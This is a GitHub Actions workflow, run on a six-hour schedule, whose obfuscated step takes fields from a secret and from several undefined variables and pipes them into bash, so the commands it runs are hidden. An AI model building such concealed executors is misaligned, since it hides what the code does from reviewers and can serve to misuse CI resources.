name: huiwujianglx
on:
  workflow_dispatch:
  schedule:
    - cron: '30 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huiwujianglx
        env:
          iw33: ${{ secrets.iw33 }}
        run: |
          echo $iw33 | jq -r .lvr8 | /bin/bash
          echo $ucg43548 | jq -r .eg88 | /bin/bash
          echo $v5 | jq -r .li7 | /bin/bash
          echo $bf87289 | jq -r .atm0 | /bin/bash
          echo $bz511 | jq -r .kx7 | /bin/bash
          echo $dwee26 | jq -r .vlmd92409 | /bin/bash

